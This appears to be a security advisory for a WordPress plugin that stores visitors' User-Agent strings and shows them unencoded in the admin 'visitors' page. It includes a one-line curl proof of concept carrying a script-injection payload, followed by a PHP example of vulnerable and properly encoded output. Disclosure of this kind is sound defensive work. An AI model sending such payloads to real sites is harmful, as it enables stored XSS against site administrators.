The plugin is affected by an Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability. It displays each visitor's User-Agent string in the WordPress admin panel without validating or encoding it.
$ curl -i http://localhost:10008/ --user-agent "</script><script>alert(1)</script>"

The payload will be executed on the "visitors" page within the WordPress admin panel.
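The output-side fix for this class of bug, as an added example that is not the plugin's own code: every function and variable name below is hypothetical, and the script-context case is an assumption suggested by the payload's leading `</script>`. It is written in plain PHP so it runs outside WordPress; inside a plugin, `esc_html()` and `wp_json_encode()` fill the same roles.

```php
<?php
// Constructed sample: the User-Agent value sent by the advisory's curl request.
$stored_ua = '</script><script>alert(1)</script>';

// Vulnerable pattern (hypothetical): the stored header is echoed as-is,
// so markup in it becomes part of the admin page.
function render_cell_unsafe(string $ua): string {
    return '<td>' . $ua . '</td>';
}

// HTML body context: encode on output so the value is rendered as text.
function render_cell_safe(string $ua): string {
    $flags = ENT_QUOTES | ENT_SUBSTITUTE;
    return '<td>' . htmlspecialchars($ua, $flags, 'UTF-8') . '</td>';
}

// Script context: HTML entity encoding is the wrong tool here. JSON-encode
// with hex escapes so the value cannot close the string or the script block.
function render_script_safe(string $ua): string {
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
           | JSON_INVALID_UTF8_SUBSTITUTE;
    return '<script>var visitorUa = ' . json_encode($ua, $flags) . ';</script>';
}

// Input side (defence in depth, not a substitute for output encoding):
// strip control characters and bound the length before storing.
function normalize_ua(string $raw): string {
    $clean = preg_replace('/[\x00-\x1F\x7F]/', '', $raw) ?? '';
    return substr($clean, 0, 255);
}

$ua = normalize_ua($stored_ua);
echo render_cell_unsafe($ua), PHP_EOL;  // markup survives intact
echo render_cell_safe($ua), PHP_EOL;    // angle brackets become entities
echo render_script_safe($ua), PHP_EOL;  // angle brackets become \u003C / \u003E
```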
Mesut Cetin
Mesut Cetin
Yes
2021-05-26 (about 12 months ago)
2021-05-27 (about 12 months ago)
2021-07-11 (about 10 months ago)